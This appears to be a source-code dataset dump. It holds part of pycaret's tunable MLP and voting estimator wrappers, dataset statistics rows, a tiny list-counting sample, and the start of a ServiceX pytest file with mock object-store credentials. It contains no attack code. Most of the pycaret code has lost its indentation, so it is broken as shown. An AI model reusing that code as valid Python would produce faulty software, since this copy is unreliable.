Glorot, Xavier, and Yoshua Bengio. "Understanding the difficulty of
training deep feedforward neural networks." International Conference
on Artificial Intelligence and Statistics. 2010.
He, Kaiming, et al. "Delving deep into rectifiers: Surpassing human-level
performance on imagenet classification." arXiv preprint
arXiv:1502.01852 (2015).
Kingma, Diederik, and Jimmy Ba. "Adam: A method for stochastic
optimization." arXiv preprint arXiv:1412.6980 (2014).
"""
def __init__(
self,
hidden_layer_sizes=None,
activation="relu",
*,
solver="adam",
alpha=0.0001,
batch_size="auto",
learning_rate="constant",
learning_rate_init=0.001,
power_t=0.5,
max_iter=200,
shuffle=True,
random_state=None,
tol=1e-4,
verbose=False,
warm_start=False,
momentum=0.9,
nesterovs_momentum=True,
early_stopping=False,
validation_fraction=0.1,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-8,
n_iter_no_change=10,
max_fun=15000,
**kwargs,
):
self.hidden_layer_sizes = hidden_layer_sizes
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(kwargs)
super().__init__(
hidden_layer_sizes=self.hidden_layer_sizes,
activation=activation,
solver=solver,
alpha=alpha,
batch_size=batch_size,
learning_rate=learning_rate,
learning_rate_init=learning_rate_init,
power_t=power_t,
max_iter=max_iter,
shuffle=shuffle,
random_state=random_state,
tol=tol,
verbose=verbose,
warm_start=warm_start,
momentum=momentum,
nesterovs_momentum=nesterovs_momentum,
early_stopping=early_stopping,
validation_fraction=validation_fraction,
beta_1=beta_1,
beta_2=beta_2,
epsilon=epsilon,
n_iter_no_change=n_iter_no_change,
max_fun=max_fun,
)
def _hidden_layer_size_kwargs_to_hidden_layer_sizes(self, kwargs):
if not self.hidden_layer_sizes:
self.hidden_layer_sizes = [100]
if not isinstance(self.hidden_layer_sizes, Iterable):
self.hidden_layer_sizes = [self.hidden_layer_sizes]
if not isinstance(self.hidden_layer_sizes, list):
self.hidden_layer_sizes = list(self.hidden_layer_sizes)
reset_layers = False
for k, v in kwargs.items():
if k.startswith("hidden_layer_size_") and not (
k in self.__dict__ and self.__dict__[k] == v
):
try:
hidden_layer_size = k.split("_")
hidden_layer_size = int(hidden_layer_size[3])
if v <= 0:
self.hidden_layer_sizes.pop(hidden_layer_size)
else:
if hidden_layer_size < len(self.hidden_layer_sizes):
self.hidden_layer_sizes[hidden_layer_size] = v
else:
self.hidden_layer_sizes = (
self.hidden_layer_sizes
+ [1]
* (hidden_layer_size - len(self.hidden_layer_sizes))
+ [v]
)
reset_layers = True
                except (ValueError, IndexError):
                    pass
if reset_layers:
self._hidden_layer_sizes_to_hidden_layer_size_kwargs()
def _hidden_layer_sizes_to_hidden_layer_size_kwargs(self):
to_delete = []
for k, v in self.__dict__.items():
if k.startswith("hidden_layer_size_") and int(k.split("_")[3]) >= len(
self.hidden_layer_sizes
):
to_delete.append(k)
for k in to_delete:
delattr(self, k)
for i, w in enumerate(self.hidden_layer_sizes):
if not (
f"hidden_layer_size_{i}" in self.__dict__
and self.__dict__[f"hidden_layer_size_{i}"] == w
):
setattr(self, f"hidden_layer_size_{i}", w)
def set_params(self, **params):
"""
Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Parameters
----------
**params : dict
Estimator parameters.
Returns
-------
self : object
Estimator instance.
"""
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(params)
super().set_params(
**{
k: v
for k, v in params.items()
if not k.startswith("hidden_layer_size_")
}
)
return self
def get_params(self, deep=True):
"""
Get parameters for this estimator.
Parameters
----------
deep : bool, default=True
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
r = super().get_params(deep=deep)
if self.hidden_layer_sizes:
for i, w in enumerate(self.hidden_layer_sizes):
if f"hidden_layer_size_{i}" not in r:
r[f"hidden_layer_size_{i}"] = w
return r
def fit(self, X, y, **fit_params):
"""Fit the model to data matrix X and target(s) y.
Parameters
----------
X : ndarray or sparse matrix of shape (n_samples, n_features)
The input data.
y : ndarray, shape (n_samples,) or (n_samples, n_outputs)
The target values (class labels in classification, real numbers in
regression).
Returns
-------
self : returns a trained MLP model.
"""
return super().fit(X, y)
def _partial_fit(self, X, y, classes=None, **fit_params):
return super()._partial_fit(X, y, classes=classes)
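
# Hedged usage sketch (editor's addition, not part of pycaret): exercises the
# ``hidden_layer_size_n`` round-trip documented in the class docstring above;
# TunableMLPRegressor below mirrors the same mechanism.
def _example_tunable_mlp():
    clf = TunableMLPClassifier(hidden_layer_sizes=(100, 50))
    assert clf.get_params()["hidden_layer_size_1"] == 50
    clf.set_params(hidden_layer_size_1=25)  # per-layer kwarg updates the list
    assert clf.hidden_layer_sizes == [100, 25]
    clf.set_params(hidden_layer_size_1=0)   # a value <= 0 drops that layer
    assert clf.hidden_layer_sizes == [100]
    return clf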
class TunableMLPRegressor(MLPRegressor):
"""
    An MLPRegressor whose hidden layer sizes are passed as kwargs instead of a list/tuple,
    allowing for tuning.
    The kwargs need to be in the format ``hidden_layer_size_n``, where ``n`` is an integer
    corresponding to the index of the layer.
    If the ``hidden_layer_sizes`` parameter is changed with ``set_params()``, the
    ``hidden_layer_size_n`` parameters will change as well, and vice versa.
scikit-learn description below:
Multi-layer Perceptron regressor.
This model optimizes the squared-loss using LBFGS or stochastic gradient
descent.
.. versionadded:: 0.18
Parameters
----------
hidden_layer_sizes : tuple, length = n_layers - 2, default=(100,)
The ith element represents the number of neurons in the ith
hidden layer.
activation : {'identity', 'logistic', 'tanh', 'relu'}, default='relu'
Activation function for the hidden layer.
- 'identity', no-op activation, useful to implement linear bottleneck,
returns f(x) = x
- 'logistic', the logistic sigmoid function,
returns f(x) = 1 / (1 + exp(-x)).
- 'tanh', the hyperbolic tan function,
returns f(x) = tanh(x).
- 'relu', the rectified linear unit function,
returns f(x) = max(0, x)
solver : {'lbfgs', 'sgd', 'adam'}, default='adam'
The solver for weight optimization.
- 'lbfgs' is an optimizer in the family of quasi-Newton methods.
- 'sgd' refers to stochastic gradient descent.
- 'adam' refers to a stochastic gradient-based optimizer proposed by
Kingma, Diederik, and Jimmy Ba
Note: The default solver 'adam' works pretty well on relatively
large datasets (with thousands of training samples or more) in terms of
both training time and validation score.
For small datasets, however, 'lbfgs' can converge faster and perform
better.
alpha : float, default=0.0001
L2 penalty (regularization term) parameter.
batch_size : int, default='auto'
Size of minibatches for stochastic optimizers.
If the solver is 'lbfgs', the classifier will not use minibatch.
When set to "auto", `batch_size=min(200, n_samples)`
learning_rate : {'constant', 'invscaling', 'adaptive'}, default='constant'
Learning rate schedule for weight updates.
- 'constant' is a constant learning rate given by
'learning_rate_init'.
- 'invscaling' gradually decreases the learning rate ``learning_rate_``
at each time step 't' using an inverse scaling exponent of 'power_t'.
effective_learning_rate = learning_rate_init / pow(t, power_t)
- 'adaptive' keeps the learning rate constant to
'learning_rate_init' as long as training loss keeps decreasing.
Each time two consecutive epochs fail to decrease training loss by at
least tol, or fail to increase validation score by at least tol if
'early_stopping' is on, the current learning rate is divided by 5.
Only used when solver='sgd'.
learning_rate_init : double, default=0.001
The initial learning rate used. It controls the step-size
in updating the weights. Only used when solver='sgd' or 'adam'.
power_t : double, default=0.5
The exponent for inverse scaling learning rate.
It is used in updating effective learning rate when the learning_rate
is set to 'invscaling'. Only used when solver='sgd'.
max_iter : int, default=200
Maximum number of iterations. The solver iterates until convergence
(determined by 'tol') or this number of iterations. For stochastic
solvers ('sgd', 'adam'), note that this determines the number of epochs
(how many times each data point will be used), not the number of
gradient steps.
shuffle : bool, default=True
Whether to shuffle samples in each iteration. Only used when
solver='sgd' or 'adam'.
random_state : int, RandomState instance, default=None
Determines random number generation for weights and bias
initialization, train-test split if early stopping is used, and batch
sampling when solver='sgd' or 'adam'.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
tol : float, default=1e-4
Tolerance for the optimization. When the loss or score is not improving
by at least ``tol`` for ``n_iter_no_change`` consecutive iterations,
unless ``learning_rate`` is set to 'adaptive', convergence is
considered to be reached and training stops.
verbose : bool, default=False
Whether to print progress messages to stdout.
warm_start : bool, default=False
When set to True, reuse the solution of the previous
call to fit as initialization, otherwise, just erase the
previous solution. See :term:`the Glossary <warm_start>`.
momentum : float, default=0.9
Momentum for gradient descent update. Should be between 0 and 1. Only
used when solver='sgd'.
nesterovs_momentum : boolean, default=True
Whether to use Nesterov's momentum. Only used when solver='sgd' and
momentum > 0.
early_stopping : bool, default=False
Whether to use early stopping to terminate training when validation
score is not improving. If set to true, it will automatically set
aside 10% of training data as validation and terminate training when
validation score is not improving by at least ``tol`` for
``n_iter_no_change`` consecutive epochs.
Only effective when solver='sgd' or 'adam'
validation_fraction : float, default=0.1
The proportion of training data to set aside as validation set for
early stopping. Must be between 0 and 1.
Only used if early_stopping is True
beta_1 : float, default=0.9
Exponential decay rate for estimates of first moment vector in adam,
should be in [0, 1). Only used when solver='adam'
beta_2 : float, default=0.999
Exponential decay rate for estimates of second moment vector in adam,
should be in [0, 1). Only used when solver='adam'
epsilon : float, default=1e-8
Value for numerical stability in adam. Only used when solver='adam'
n_iter_no_change : int, default=10
Maximum number of epochs to not meet ``tol`` improvement.
Only effective when solver='sgd' or 'adam'
.. versionadded:: 0.20
max_fun : int, default=15000
Only used when solver='lbfgs'. Maximum number of function calls.
The solver iterates until convergence (determined by 'tol'), number
of iterations reaches max_iter, or this number of function calls.
Note that number of function calls will be greater than or equal to
the number of iterations for the MLPRegressor.
.. versionadded:: 0.22
Attributes
----------
loss_ : float
The current loss computed with the loss function.
coefs_ : list, length n_layers - 1
The ith element in the list represents the weight matrix corresponding
to layer i.
intercepts_ : list, length n_layers - 1
The ith element in the list represents the bias vector corresponding to
layer i + 1.
    n_iter_ : int
        The number of iterations the solver has run.
n_layers_ : int
Number of layers.
n_outputs_ : int
Number of outputs.
out_activation_ : string
Name of the output activation function.
Examples
--------
>>> from sklearn.neural_network import MLPRegressor
>>> from sklearn.datasets import make_regression
>>> from sklearn.model_selection import train_test_split
>>> X, y = make_regression(n_samples=200, random_state=1)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... random_state=1)
>>> regr = MLPRegressor(random_state=1, max_iter=500).fit(X_train, y_train)
>>> regr.predict(X_test[:2])
array([-0.9..., -7.1...])
>>> regr.score(X_test, y_test)
0.4...
Notes
-----
MLPRegressor trains iteratively since at each time step
the partial derivatives of the loss function with respect to the model
parameters are computed to update the parameters.
It can also have a regularization term added to the loss function
that shrinks model parameters to prevent overfitting.
This implementation works with data represented as dense and sparse numpy
arrays of floating point values.
References
----------
Hinton, Geoffrey E.
"Connectionist learning procedures." Artificial intelligence 40.1
(1989): 185-234.
Glorot, Xavier, and Yoshua Bengio. "Understanding the difficulty of
training deep feedforward neural networks." International Conference
on Artificial Intelligence and Statistics. 2010.
He, Kaiming, et al. "Delving deep into rectifiers: Surpassing human-level
performance on imagenet classification." arXiv preprint
arXiv:1502.01852 (2015).
Kingma, Diederik, and Jimmy Ba. "Adam: A method for stochastic
optimization." arXiv preprint arXiv:1412.6980 (2014).
"""
def __init__(
self,
hidden_layer_sizes=None,
activation="relu",
*,
solver="adam",
alpha=0.0001,
batch_size="auto",
learning_rate="constant",
learning_rate_init=0.001,
power_t=0.5,
max_iter=200,
shuffle=True,
random_state=None,
tol=1e-4,
verbose=False,
warm_start=False,
momentum=0.9,
nesterovs_momentum=True,
early_stopping=False,
validation_fraction=0.1,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-8,
n_iter_no_change=10,
max_fun=15000,
**kwargs,
):
self.hidden_layer_sizes = hidden_layer_sizes
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(kwargs)
super().__init__(
hidden_layer_sizes=self.hidden_layer_sizes,
activation=activation,
solver=solver,
alpha=alpha,
batch_size=batch_size,
learning_rate=learning_rate,
learning_rate_init=learning_rate_init,
power_t=power_t,
max_iter=max_iter,
shuffle=shuffle,
random_state=random_state,
tol=tol,
verbose=verbose,
warm_start=warm_start,
momentum=momentum,
nesterovs_momentum=nesterovs_momentum,
early_stopping=early_stopping,
validation_fraction=validation_fraction,
beta_1=beta_1,
beta_2=beta_2,
epsilon=epsilon,
n_iter_no_change=n_iter_no_change,
max_fun=max_fun,
)
def _hidden_layer_size_kwargs_to_hidden_layer_sizes(self, kwargs):
if not self.hidden_layer_sizes:
self.hidden_layer_sizes = [100]
if not isinstance(self.hidden_layer_sizes, Iterable):
self.hidden_layer_sizes = [self.hidden_layer_sizes]
if not isinstance(self.hidden_layer_sizes, list):
self.hidden_layer_sizes = list(self.hidden_layer_sizes)
reset_layers = False
for k, v in kwargs.items():
if k.startswith("hidden_layer_size_") and not (
k in self.__dict__ and self.__dict__[k] == v
):
try:
hidden_layer_size = k.split("_")
hidden_layer_size = int(hidden_layer_size[3])
if v <= 0:
self.hidden_layer_sizes.pop(hidden_layer_size)
else:
if hidden_layer_size < len(self.hidden_layer_sizes):
self.hidden_layer_sizes[hidden_layer_size] = v
else:
self.hidden_layer_sizes = (
self.hidden_layer_sizes
+ [1]
* (hidden_layer_size - len(self.hidden_layer_sizes))
+ [v]
)
reset_layers = True
                except (ValueError, IndexError):
                    pass
if reset_layers:
self._hidden_layer_sizes_to_hidden_layer_size_kwargs()
def _hidden_layer_sizes_to_hidden_layer_size_kwargs(self):
to_delete = []
for k, v in self.__dict__.items():
if k.startswith("hidden_layer_size_") and int(k.split("_")[3]) >= len(
self.hidden_layer_sizes
):
to_delete.append(k)
for k in to_delete:
delattr(self, k)
for i, w in enumerate(self.hidden_layer_sizes):
if not (
f"hidden_layer_size_{i}" in self.__dict__
and self.__dict__[f"hidden_layer_size_{i}"] == w
):
setattr(self, f"hidden_layer_size_{i}", w)
def set_params(self, **params):
"""
Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Parameters
----------
**params : dict
Estimator parameters.
Returns
-------
self : object
Estimator instance.
"""
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(params)
super().set_params(
**{
k: v
for k, v in params.items()
if not k.startswith("hidden_layer_size_")
}
)
return self
def get_params(self, deep=True):
"""
Get parameters for this estimator.
Parameters
----------
deep : bool, default=True
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
r = super().get_params(deep=deep)
if self.hidden_layer_sizes:
for i, w in enumerate(self.hidden_layer_sizes):
if f"hidden_layer_size_{i}" not in r:
r[f"hidden_layer_size_{i}"] = w
return r
def fit(self, X, y, **fit_params):
"""Fit the model to data matrix X and target(s) y.
Parameters
----------
X : ndarray or sparse matrix of shape (n_samples, n_features)
The input data.
y : ndarray, shape (n_samples,) or (n_samples, n_outputs)
The target values (class labels in classification, real numbers in
regression).
Returns
-------
self : returns a trained MLP model.
"""
return super().fit(X, y)
def _partial_fit(self, X, y, **fit_params):
return super()._partial_fit(X, y)
class TunableVotingClassifier(VotingClassifier):
"""
    A VotingClassifier whose weights are passed as kwargs instead of a list, allowing
    for tuning.
    The kwargs need to be in the format ``weight_n``, where ``n`` is an integer corresponding
    to the index of the estimator.
    If the ``weights`` parameter is changed with ``set_params()``, the ``weight_n``
    parameters will change as well, and vice versa.
scikit-learn description below:
Soft Voting/Majority Rule classifier for unfitted estimators.
Parameters
----------
estimators : list of (str, estimator) tuples
Invoking the ``fit`` method on the ``VotingClassifier`` will fit clones
of those original estimators that will be stored in the class attribute
``self.estimators_``. An estimator can be set to ``'drop'``
using ``set_params``.
.. versionchanged:: 0.21
``'drop'`` is accepted.
.. deprecated:: 0.22
Using ``None`` to drop an estimator is deprecated in 0.22 and
support will be dropped in 0.24. Use the string ``'drop'`` instead.
voting : {'hard', 'soft'}, default='hard'
If 'hard', uses predicted class labels for majority rule voting.
Else if 'soft', predicts the class label based on the argmax of
the sums of the predicted probabilities, which is recommended for
an ensemble of well-calibrated classifiers.
weights : array-like of shape (n_classifiers,), default=None
Sequence of weights (`float` or `int`) to weight the occurrences of
predicted class labels (`hard` voting) or class probabilities
before averaging (`soft` voting). Uses uniform weights if `None`.
n_jobs : int, default=None
The number of jobs to run in parallel for ``fit``.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
.. versionadded:: 0.18
flatten_transform : bool, default=True
Affects shape of transform output only when voting='soft'
If voting='soft' and flatten_transform=True, transform method returns
matrix with shape (n_samples, n_classifiers * n_classes). If
flatten_transform=False, it returns
(n_classifiers, n_samples, n_classes).
verbose : bool, default=False
If True, the time elapsed while fitting will be printed as it
is completed.
**kwargs:
Weights in format ``weight_n`` where ``n`` is an integer corresponding
to the index of the estimator. Will overwrite ``weights``.
Attributes
----------
estimators_ : list of classifiers
The collection of fitted sub-estimators as defined in ``estimators``
that are not 'drop'.
named_estimators_ : :class:`~sklearn.utils.Bunch`
Attribute to access any fitted sub-estimators by name.
.. versionadded:: 0.20
classes_ : array-like of shape (n_predictions,)
The classes labels.
See Also
--------
VotingRegressor: Prediction voting regressor.
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import LogisticRegression
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.ensemble import RandomForestClassifier, VotingClassifier
>>> clf1 = LogisticRegression(multi_class='multinomial', random_state=1)
>>> clf2 = RandomForestClassifier(n_estimators=50, random_state=1)
>>> clf3 = GaussianNB()
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> eclf1 = VotingClassifier(estimators=[
... ('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='hard')
>>> eclf1 = eclf1.fit(X, y)
>>> print(eclf1.predict(X))
[1 1 1 2 2 2]
>>> np.array_equal(eclf1.named_estimators_.lr.predict(X),
... eclf1.named_estimators_['lr'].predict(X))
True
>>> eclf2 = VotingClassifier(estimators=[
... ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
... voting='soft')
>>> eclf2 = eclf2.fit(X, y)
>>> print(eclf2.predict(X))
[1 1 1 2 2 2]
>>> eclf3 = VotingClassifier(estimators=[
... ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
... voting='soft', weights=[2,1,1],
... flatten_transform=True)
>>> eclf3 = eclf3.fit(X, y)
>>> print(eclf3.predict(X))
[1 1 1 2 2 2]
>>> print(eclf3.transform(X).shape)
(6, 6)
"""
def __init__(
self,
estimators,
*,
voting="hard",
weights=None,
n_jobs=None,
flatten_transform=True,
verbose=False,
**kwargs,
):
self.weights = weights
self._weight_kwargs_to_weights(kwargs, estimators=estimators)
super().__init__(
estimators=estimators,
voting=voting,
weights=self.weights,
n_jobs=n_jobs,
flatten_transform=flatten_transform,
verbose=verbose,
)
def _weight_kwargs_to_weights(self, kwargs, estimators=None):
if estimators is None:
estimators = self.estimators
        if not self.weights:
            self.weights = [1] * len(estimators)
        if len(self.weights) < len(estimators):
            self.weights += [1] * (len(estimators) - len(self.weights))
        for k, v in kwargs.items():
            if k.startswith("weight_"):
                try:
                    index = int(k.split("_")[1])
                    self.weights[index] = v
                except (ValueError, IndexError, TypeError):
                    # ignore malformed or out-of-range weight_* keys
                    pass
self._weights_to_weight_kwargs()
def _weights_to_weight_kwargs(self):
for i, w in enumerate(self.weights):
if not (
f"weight_{i}" in self.__dict__ and self.__dict__[f"weight_{i}"] == w
):
setattr(self, f"weight_{i}", w)
def set_params(self, **params):
"""
Set the parameters of an estimator from the ensemble.
Valid parameter keys can be listed with `get_params()`.
Parameters
----------
**params : keyword arguments
    Specific parameters using e.g.
    ``set_params(parameter_name=new_value)``. In addition to setting the
    parameters of the ensemble estimator, the individual estimators of
    the ensemble can also be set, or removed by setting them to 'drop'.
    ``weight_n`` keys update the corresponding entry of ``weights``.
"""
super()._set_params("estimators", **params)
self._weight_kwargs_to_weights(params)
return self
def get_params(self, deep=True):
"""
Get the parameters of an estimator from the ensemble.
Parameters
----------
deep : bool, default=True
    If True, the parameters of the contained classifiers are returned as
    well, in addition to the ensemble's own parameters (including the
    ``weight_n`` entries).
"""
r = super()._get_params("estimators", deep=deep)
if self.weights:
for i, w in enumerate(self.weights):
if f"weight_{i}" not in r:
r[f"weight_{i}"] = w
return r
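# A minimal, self-contained usage sketch for TunableVotingClassifier. The
# data and estimator choices below are illustrative only; the point is that
# per-estimator weights surface as ``weight_n`` parameters that stay in sync
# with the ``weights`` list.
def _demo_tunable_voting_classifier():
    import numpy as np
    from sklearn.linear_model import LogisticRegression
    from sklearn.naive_bayes import GaussianNB

    X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
    y = np.array([0, 0, 1, 1])
    clf = TunableVotingClassifier(
        estimators=[("lr", LogisticRegression()), ("gnb", GaussianNB())],
        voting="soft",
        weight_0=2.0,
        weight_1=1.0,
    )
    assert clf.weights == [2.0, 1.0]
    clf.set_params(weight_1=3.0)  # also updates clf.weights -> [2.0, 3.0]
    assert clf.get_params()["weight_1"] == 3.0
    return clf.fit(X, y).predict(X)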
class TunableVotingRegressor(VotingRegressor):
"""
A VotingRegressor with weights being kwargs instead of a list, allowing
for tuning.
The kwargs need to be in the format ``weight_n``, where ``n`` is an integer
corresponding to the index of the estimator.
If the ``weights`` parameter is changed with ``set_params()``, the
``weight_n`` parameters change as well, and vice versa.
scikit-learn description below:
Prediction voting regressor for unfitted estimators.
.. versionadded:: 0.21
A voting regressor is an ensemble meta-estimator that fits several base
regressors, each on the whole dataset. Then it averages the individual
predictions to form a final prediction.
Read more in the :ref:`User Guide <voting_regressor>`.
Parameters
----------
estimators : list of (str, estimator) tuples
Invoking the ``fit`` method on the ``VotingRegressor`` will fit clones
of those original estimators that will be stored in the class attribute
``self.estimators_``. An estimator can be set to ``'drop'`` using
``set_params``.
.. versionchanged:: 0.21
``'drop'`` is accepted.
.. deprecated:: 0.22
Using ``None`` to drop an estimator is deprecated in 0.22 and
support will be dropped in 0.24. Use the string ``'drop'`` instead.
weights : array-like of shape (n_regressors,), default=None
Sequence of weights (`float` or `int`) to weight the occurrences of
predicted values before averaging. Uses uniform weights if `None`.
n_jobs : int, default=None
The number of jobs to run in parallel for ``fit``.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
verbose : bool, default=False
If True, the time elapsed while fitting will be printed as it
is completed.
Attributes
----------
estimators_ : list of regressors
The collection of fitted sub-estimators as defined in ``estimators``
that are not 'drop'.
named_estimators_ : Bunch
Attribute to access any fitted sub-estimators by name.
.. versionadded:: 0.20
See Also
--------
VotingClassifier: Soft Voting/Majority Rule classifier.
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import LinearRegression
>>> from sklearn.ensemble import RandomForestRegressor
>>> from sklearn.ensemble import VotingRegressor
>>> r1 = LinearRegression()
>>> r2 = RandomForestRegressor(n_estimators=10, random_state=1)
>>> X = np.array([[1, 1], [2, 4], [3, 9], [4, 16], [5, 25], [6, 36]])
>>> y = np.array([2, 6, 12, 20, 30, 42])
>>> er = VotingRegressor([('lr', r1), ('rf', r2)])
>>> print(er.fit(X, y).predict(X))
[ 3.3 5.7 11.8 19.7 28. 40.3]
"""
def __init__(
self, estimators, *, weights=None, n_jobs=None, verbose=False, **kwargs,
):
self.weights = weights
self._weight_kwargs_to_weights(kwargs, estimators=estimators)
super().__init__(
estimators=estimators, weights=self.weights, n_jobs=n_jobs, verbose=verbose,
)
def _weight_kwargs_to_weights(self, kwargs, estimators=None):
if estimators is None:
estimators = self.estimators
        if not self.weights:
            self.weights = [1] * len(estimators)
        if len(self.weights) < len(estimators):
            self.weights += [1] * (len(estimators) - len(self.weights))
        for k, v in kwargs.items():
            if k.startswith("weight_"):
                try:
                    index = int(k.split("_")[1])
                    self.weights[index] = v
                except (ValueError, IndexError, TypeError):
                    # ignore malformed or out-of-range weight_* keys
                    pass
self._weights_to_weight_kwargs()
def _weights_to_weight_kwargs(self):
for i, w in enumerate(self.weights):
if not (
f"weight_{i}" in self.__dict__ and self.__dict__[f"weight_{i}"] == w
):
setattr(self, f"weight_{i}", w)
def set_params(self, **params):
"""
Set the parameters of an estimator from the ensemble.
Valid parameter keys can be listed with `get_params()`.
Parameters
----------
**params : keyword arguments
    Specific parameters using e.g.
    ``set_params(parameter_name=new_value)``. In addition to setting the
    parameters of the ensemble estimator, the individual estimators of
    the ensemble can also be set, or removed by setting them to 'drop'.
    ``weight_n`` keys update the corresponding entry of ``weights``.
"""
super()._set_params("estimators", **params)
self._weight_kwargs_to_weights(params)
return self
def get_params(self, deep=True):
"""
Get the parameters of an estimator from the ensemble.
Parameters
----------
deep : bool, default=True
    If True, the parameters of the contained regressors are returned as
    well, in addition to the ensemble's own parameters (including the
    ``weight_n`` entries).
"""
r = super()._get_params("estimators", deep=deep)
if self.weights:
for i, w in enumerate(self.weights):
if f"weight_{i}" not in r:
r[f"weight_{i}"] = w
return r
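# A matching usage sketch for TunableVotingRegressor (illustrative data; not
# part of the original source).
def _demo_tunable_voting_regressor():
    import numpy as np
    from sklearn.linear_model import LinearRegression
    from sklearn.tree import DecisionTreeRegressor

    X = np.array([[1], [2], [3], [4]])
    y = np.array([2.0, 4.0, 6.0, 8.0])
    reg = TunableVotingRegressor(
        estimators=[("lr", LinearRegression()),
                    ("dt", DecisionTreeRegressor())],
        weight_0=1.0,
        weight_1=2.0,
    )
    assert reg.weights == [1.0, 2.0]
    return reg.fit(X, y).predict(X)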
| [stats row for the file above: avg_line_length 36.515625, max_line_length 97, alphanum_fraction 0.614395, 1,215 lines, 44,403 bytes; remaining qsc_* quality-signal columns elided] |
| 4c335a075081c7f5e7cee274ed8b013fd35838bd | 41 | py | Python | code/sample_4-3-18.py | KoyanagiHitoshi/AtCoder-Python-Introduction | 6d014e333a873f545b4d32d438e57cf428b10b96 | ["MIT"] | stars: 1 (2022-03-29) | issues: null | forks: null |
x = [1, 2, 3, 4, 3, 5]
print(x.count(3))  # list.count returns the number of occurrences of 3 -> prints 2
| [stats row for the file above: avg_line_length 13.666667, max_line_length 22, alphanum_fraction 0.463415, 2 lines, 41 bytes; remaining qsc_* quality-signal columns elided] |
| 4c4462f40e3c1f9a11b3f298d2c8a95797a3fb50 | 6,102 | py | Python | tests/resources/test_transformation_request.py | zorache/ServiceX_App | 4479afa0f019bbdcd35812691e78abba442c9d37 | ["BSD-3-Clause"] | stars: null | issues: null | forks: null |
from tests.resource_test_base import ResourceTestBase
class TestTransformationRequest(ResourceTestBase):
def test_get_single_request_no_object_store(self, mocker):
import servicex
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest,
'return_request',
return_value=self._generate_transform_request())
client = self._test_client(extra_config={'OBJECT_STORE_ENABLED': False})
response = client.get('/servicex/transformation/1234')
assert response.status_code == 200
assert response.json == {'request_id': 'BR549', 'did': '123-456-789',
'columns': 'electron.eta(), muon.pt()',
'selection': None,
'tree-name': "Events",
'image': 'ssl-hep/foo:latest', 'chunk-size': 1000,
'workers': 42, 'result-destination': 'kafka',
'result-format': 'arrow',
'kafka-broker': 'http://ssl-hep.org.kafka:12345',
'workflow-name': None,
'generated-code-cm': None,
'status': "Submitted",
'failure-info': None,
'app-version': "1.0.1",
'code-gen-image': 'sslhep/servicex_code_gen_func_adl_xaod:develop'
}
mock_transform_request_read.assert_called_with('1234')
def test_get_single_request_with_object_store(self, mocker):
import servicex
object_store_transform_request = self._generate_transform_request()
object_store_transform_request.result_destination = 'object-store'
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest,
'return_request',
return_value=object_store_transform_request)
local_config = {
'OBJECT_STORE_ENABLED': True,
'MINIO_PUBLIC_URL': 'minio.servicex.com:9000',
'MINIO_SECURED': True,
'MINIO_ACCESS_KEY': 'miniouser',
'MINIO_SECRET_KEY': 'leftfoot1'
}
client = self._test_client(extra_config=local_config)
response = client.get('/servicex/transformation/1234')
assert response.status_code == 200
assert response.json == {'request_id': 'BR549', 'did': '123-456-789',
'columns': 'electron.eta(), muon.pt()',
'selection': None,
'tree-name': "Events",
'image': 'ssl-hep/foo:latest', 'chunk-size': 1000,
'kafka-broker': 'http://ssl-hep.org.kafka:12345',
'workers': 42, 'result-destination': 'object-store',
'result-format': 'arrow',
'minio-endpoint': 'minio.servicex.com:9000',
'minio-secured': True,
'minio-access-key': 'miniouser',
'minio-secret-key': 'leftfoot1',
'workflow-name': None,
'generated-code-cm': None,
'status': "Submitted",
'failure-info': None,
'app-version': "1.0.1",
'code-gen-image': 'sslhep/servicex_code_gen_func_adl_xaod:develop'
}
mock_transform_request_read.assert_called_with('1234')
def test_get_single_request_to_kafka(self, mocker, mock_rabbit_adaptor):
import servicex
kafka_transform_request = self._generate_transform_request()
kafka_transform_request.result_destination = 'kafka'
mock_transform_request_read = mocker.patch.object(
servicex.models.TransformRequest,
'return_request',
return_value=kafka_transform_request)
local_config = {
'OBJECT_STORE_ENABLED': True,
'MINIO_PUBLIC_URL': 'minio.servicex.com:9000',
'MINIO_ACCESS_KEY': 'miniouser',
'MINIO_SECRET_KEY': 'leftfoot1'
}
client = self._test_client(extra_config=local_config)
response = client.get('/servicex/transformation/1234')
assert response.status_code == 200
assert response.json == {'request_id': 'BR549', 'did': '123-456-789',
'columns': 'electron.eta(), muon.pt()',
'selection': None,
'tree-name': "Events",
'image': 'ssl-hep/foo:latest', 'chunk-size': 1000,
'kafka-broker': 'http://ssl-hep.org.kafka:12345',
'workers': 42, 'result-destination': 'kafka',
'result-format': 'arrow',
'workflow-name': None,
'generated-code-cm': None,
'status': "Submitted",
'failure-info': None,
'app-version': "1.0.1",
